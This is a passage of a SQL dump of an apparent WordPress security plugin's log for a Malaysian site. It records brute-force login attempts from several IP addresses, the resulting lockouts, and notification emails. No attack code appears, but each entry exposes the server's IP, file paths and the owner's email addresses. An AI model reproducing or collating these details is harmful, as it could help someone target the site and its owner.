N\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY-@knlR@6WyRVzpiDrowAAAAA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079290.6961\";s:12:\"REQUEST_TIME\";s:10:\"1569079290\";}}','notice','2019-09-21 15:21:32','2019-09-21 15:21:31',19230464,20718840,'https://bintara.com.my/blog/wp-login.php',1,0,'192.254.207.43'),(26611,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:21:31\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:21:31\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:21:31\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:21:31\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:21:32','2019-09-21 15:21:31',19315480,20718840,'https://bintara.com.my/blog/wp-login.php',1,0,'192.254.207.43'),(26612,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:21:32','2019-09-21 15:21:31',19523176,20718840,'https://bintara.com.my/blog/wp-login.php',1,0,'192.254.207.43'),(26613,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZAFEnlR@6WyRVzpiDrswAAABI\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"207.55.255.20\";s:11:\"REMOTE_PORT\";s:5:\"47576\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZAFEnlR@6WyRVzpiDrswAAABI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079316.9856\";s:12:\"REQUEST_TIME\";s:10:\"1569079316\";}}','notice','2019-09-21 15:21:58','2019-09-21 15:21:57',19230128,20718232,'https://bintara.com.my/wp/wp-login.php',1,0,'207.55.255.20'),(26614,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:21:57\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:21:57\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:21:57\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:21:57\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:21:58','2019-09-21 15:21:57',19315296,20718232,'https://bintara.com.my/wp/wp-login.php',1,0,'207.55.255.20'),(26615,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:21:58','2019-09-21 15:21:57',19522480,20718232,'https://bintara.com.my/wp/wp-login.php',1,0,'207.55.255.20'),(26616,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZAOnkXpgmG5P@iB8lGZgAAAIg\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"132.148.157.66\";s:11:\"REMOTE_PORT\";s:5:\"44524\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZAOnkXpgmG5P@iB8lGZgAAAIg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569079354.988\";s:12:\"REQUEST_TIME\";s:10:\"1569079354\";}}','notice','2019-09-21 15:22:36','2019-09-21 15:22:35',19230880,20719216,'https://bintara.com.my/test/wp-login.php',1,0,'132.148.157.66'),(26617,0,'lockout','host-lockout::132.148.157.66','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:14:\"132.148.157.66\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:22:35\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:22:35\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:22:35\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:22:35\";s:12:\"lockout_host\";s:14:\"132.148.157.66\";}','action','2019-09-21 15:22:36','2019-09-21 15:22:35',19316616,20719216,'https://bintara.com.my/test/wp-login.php',1,0,'132.148.157.66'),(26618,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:14:\"132.148.157.66\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:22:35\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:22:35\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:22:35\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:22:35\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:22:36','2019-09-21 15:22:35',19316568,20719216,'https://bintara.com.my/test/wp-login.php',1,0,'132.148.157.66'),(26619,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:22:36','2019-09-21 15:22:35',19524704,20719216,'https://bintara.com.my/test/wp-login.php',1,0,'132.148.157.66'),(26620,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZAUEnlR@6WyRVzpiDr1QAAAAo\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"103.221.221.112\";s:11:\"REMOTE_PORT\";s:5:\"39712\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZAUEnlR@6WyRVzpiDr1QAAAAo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079376.9295\";s:12:\"REQUEST_TIME\";s:10:\"1569079376\";}}','notice','2019-09-21 15:22:58','2019-09-21 15:22:57',19228984,20718096,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.221.221.112'),(26621,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:22:57\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:22:57\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:22:57\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:22:57\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:22:58','2019-09-21 15:22:57',19314712,20718096,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.221.221.112'),(26622,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:22:58','2019-09-21 15:22:57',19522832,20718096,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.221.221.112'),(26623,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZAW0nlR@6WyRVzpiDr6wAAAAI\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"138.197.146.132\";s:11:\"REMOTE_PORT\";s:5:\"33536\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZAW0nlR@6WyRVzpiDr6wAAAAI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079387.1204\";s:12:\"REQUEST_TIME\";s:10:\"1569079387\";}}','notice','2019-09-21 15:23:08','2019-09-21 15:23:07',19230160,20718720,'https://bintara.com.my/2019/wp-login.php',1,0,'138.197.146.132'),(26624,0,'lockout','host-lockout::138.197.146.132','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:15:\"138.197.146.132\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:23:07\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:23:07\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:23:07\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:23:07\";s:12:\"lockout_host\";s:15:\"138.197.146.132\";}','action','2019-09-21 15:23:08','2019-09-21 15:23:07',19316160,20718720,'https://bintara.com.my/2019/wp-login.php',1,0,'138.197.146.132'),(26625,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:15:\"138.197.146.132\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:23:07\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:23:07\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:23:07\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:23:07\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:23:08','2019-09-21 15:23:07',19316072,20718720,'https://bintara.com.my/2019/wp-login.php',1,0,'138.197.146.132'),(26626,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:23:08','2019-09-21 15:23:07',19525432,20718720,'https://bintara.com.my/2019/wp-login.php',1,0,'138.197.146.132'),(26627,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZAZ0nlR@6WyRVzpiDr@AAAAAk\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"51.77.193.28\";s:11:\"REMOTE_PORT\";s:5:\"48270\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZAZ0nlR@6WyRVzpiDr@AAAAAk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079399.7135\";s:12:\"REQUEST_TIME\";s:10:\"1569079399\";}}','notice','2019-09-21 15:23:21','2019-09-21 15:23:20',19229496,20717368,'https://bintara.com.my/wp/wp-login.php',1,0,'51.77.193.28'),(26628,0,'lockout','host-lockout::51.77.193.28','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:12:\"51.77.193.28\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:23:20\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:23:20\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:23:20\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:23:20\";s:12:\"lockout_host\";s:12:\"51.77.193.28\";}','action','2019-09-21 15:23:21','2019-09-21 